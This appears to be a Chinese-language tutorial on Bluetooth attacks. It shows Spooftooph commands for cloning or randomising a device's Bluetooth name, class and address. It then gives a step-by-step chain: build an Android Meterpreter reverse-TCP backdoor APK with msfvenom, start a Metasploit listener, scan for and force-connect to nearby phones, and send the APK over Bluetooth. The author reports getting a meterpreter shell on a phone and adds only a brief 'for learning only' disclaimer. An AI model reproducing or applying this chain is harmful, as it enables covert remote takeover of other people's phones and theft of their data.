无线安全——蓝牙
基础点:hciconfig hcitool scan
Spooftooph是一个牛*的工具,旨在自动欺骗或克隆蓝牙信息(名称,类和地址)。欺骗蓝牙信息对于许多目的是有用的,例如将蓝牙设备隐藏在普通站点中,访问受保护的信息和观察。这是它的特点:
克隆并记录蓝牙设备信息生成随机的新蓝牙配置文件每隔X秒更改蓝牙配置文件指定蓝牙接口的设备信息从扫描日志中选择要克隆的设备注意: 要修改蓝牙适配器,必须以root权限运行spooftooth。Spooftooph提供五种使用模式:
指定NAME,CLASS和ADDR。
root @ test:spooftooph -i hci0 -n new_name -a 00:11:22:33:44:55 -c 0x1c010c
随机生成NAME,CLASS和ADDR。
root @ test:spooftooph -i hci0 -R
扫描范围内的设备并选择要克隆的设备。(可选)将设备信息转储到指定的日志文件中。
root @ test:spooftooph -i hci0 -s -w file.csv
从日志文件加载设备信息并指定要克隆的设备信息。
root @ test:spooftooph -i hci0 -r file.csv
每隔x秒在范围内克隆随机设备信息。
root @ test:spooftooph -i hci0 -t 10
用法:
spooftooph -i dev [-mstu] [-nac] | [-R] | [-r file] [-w file]
-a <address>:指定新的BD_ADDR
-b <num_lines>:每个要显示的蓝牙配置文件数页面
-B:对于较小的屏幕禁用横幅(如手机)
-c <类>:指定新类
-h:帮助
-i <开发>:指定接口
-m:选择在指定多个接口
-n <名>:指定新名称
-r <文件>:读入CSV日志文件
-R:分配随机名称,CLASS和ADDR
-s:扫描本地区域中的设备
-t <时间>:克隆设备的时间间隔
-u:USB延迟。用于重新初始化接口
-w <file>的交互式延迟:写入CSV日志文件(在必须通过USB时在虚拟化环境中有用。)
下面结合metasploit进行蓝牙hack
一、使用metasploit生成Android后门
msfvenom –p android/meterpreter/reverse_tcp LHOST={ip} LPORT={port} R > ~/fuck.apk
二、打开msf,启动监听
use exploit/mutli/handler
set payload android/meterpreter/reverse_tcp
set LHOST {ip}
set LPORT {port}
show options
exploit
三、蓝牙工具
查看设备:hciconfig
激活设备:hciconfig hci0 up
扫描蓝牙设备:hcitool scan
若如果对方开启隐藏,可以使用fang工具扫描隐藏的蓝牙设备
:::接下来就是:::
(强行连接)
blueranger.sh { hciX} { bdaddr }
四、发送APK
在新版用blueman发送可能会不成功,利用旧版的kali下的bluetooth-sendto进行发送,即可获得meterpreter ~(感觉是源的问题)
通过对手机测试,成功取得meterpreter
声明:
本篇文章仅仅学习交流、切勿进行违法行为